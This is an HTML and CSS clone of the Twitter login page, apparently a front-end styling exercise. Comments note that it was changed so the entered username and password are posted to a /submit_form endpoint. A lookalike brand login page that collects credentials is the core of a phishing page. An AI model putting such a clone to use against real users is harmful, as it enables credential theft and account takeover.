<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Twitter Login Form</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta name="keywords" content="Form,flex, ,Twitter form ,sachindusahan,html,css" />
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
* {
	margin:0;
	padding:0;
	box-sizing:border-box;
}

.container {
	height:100vh;
}

/* Div 1 */
.div-1 {
	display:flex;
}

.div-1 > .sub-div-1 {
	flex:1;
	display:flex;
	justify-content:center;
}

.sub-div-1 > .icon {
	font-size:35px;
	color:#1194FF;
	margin:20px 0 30px 0;
}

/* Div 2 */
.div-2 {
	display:flex;
}

.div-2 > .sub-div-2 {
	flex:1;
	display:flex;
	justify-content:center;
}

.div-2 > .sub-div-2 > h3 {
	font-family:Verdana;
}

/* Div 3 */
.div-3 {
	display:flex;
	justify-content:center;
}

.div-3 > .sub-div-3 {
	background:#F8f8f8;
	margin:20px 0 0 0;
	width:55%;
	height:50px;
	position:relative;
	border-bottom:1.5px solid #555;
}

.sub-div-3 > label {
	margin-left:7px;
	font-size:14px;
	font-family:helvetica;
	color:#787878;
}

.sub-div-3 > input {
	all:unset;
	position:absolute;
	bottom:0;
	width:100%;
	height:30px;
	padding:9px 0 0 7px;
}

/* div 4 */
.div-4 {
	display:flex;
	justify-content:center;
}

.div-4 > .sub-div-4 {
	background:#f8f8f8;
	margin:20px 0 0 0;
	width:55%;
	height:50px;
	position:relative;
	border-bottom:1.5px solid #555;
}

.sub-div-4 > label {
	margin-left:7px;
	font-size:14px;
	font-family:helvetica;
	color:#787878;
}

.sub-div-4 > input {
	all:unset;
	position:absolute;
	bottom:0;
	width:100%;
	height:30px;
	padding:9px 0 0 7px;
}

/* Five*/
.div-5 {
	display:flex;
}

.div-5 > .sub-div-5 {
	flex:1;
	display:flex;
	justify-content:center;
	margin-top:20px;
}

.div-5 > .sub-div-5 > button {
	all:unset;
	height:50px;
	width:56%;
	border-radius:29px;
	text-align:center;
	background:#0c80df;
	opacity:0.5;
	color:#FFF;
	font-weight:600;
	font-family:Verdana;
}

/* 
6
*/
.div-6 {
	display:flex;
}

.div-6 > .sub-div-6 {
	flex:1;
	display:flex;
	justify-content:center;
}

.div-6 > .sub-div-6 > a {
	text-decoration:none;
	color:#1194FF;
	font-size:14px;
	margin-top:20px;
	font-family:Verdana;
}

@media only screen and (max-width: 480px) and (min-width: 320px) {
	.div-3 > .sub-div-3,.div-4 > .sub-div-4 {
		width:85%;	
	}
	.div-5 > .sub-div-5 > button {
		width:85.5%;
	}

}
@media only screen and (max-width: 800px) and (min-width: 481px) {
	.div-3 > .sub-div-3,.div-4 > .sub-div-4 {
		width:70%;	
	}
	.div-5 > .sub-div-5 > button {
		width:71%;
	}

}
</style>
</head>
<body>
    <div class='container'>
          <div class='div-1'>
              <div class='sub-div-1'>
                  <i class="fa fa-twitter icon"></i>
              </div>
          </div>
          <div class='div-2'>
              <div class='sub-div-2'>
                  <h3>Log in to Twitter</h3>
              </div>
          </div>
          <form action="/submit_form" method="post"> <!-- Added form action -->
              <div class='div-3'>
                  <div class='sub-div-3'>
                      <label>Phone, email or username</label><br>
                      <input type='text' name='username'> <!-- Added name attribute -->
                  </div>
              </div>
              <div class='div-4'>
                  <div class='sub-div-4'>
                      <label>Password</label><br>
                      <input type='password' name='password'> <!-- Added name attribute -->
                  </div>
              </div>
              <div class='div-5'>
                  <div class='sub-div-5'>
                      <button type="submit">Log in</button> <!-- Changed button type to submit -->
                  </div>
              </div>
          </form>
          <div class='div-6'>
              <div class='sub-div-6'>
                  <a href=''>Forgot password? .&nbsp;</a>
                  <a href=''>Sign up for Twitter</a>
              </div>
          </div>
      </div>
  </body>
</html>
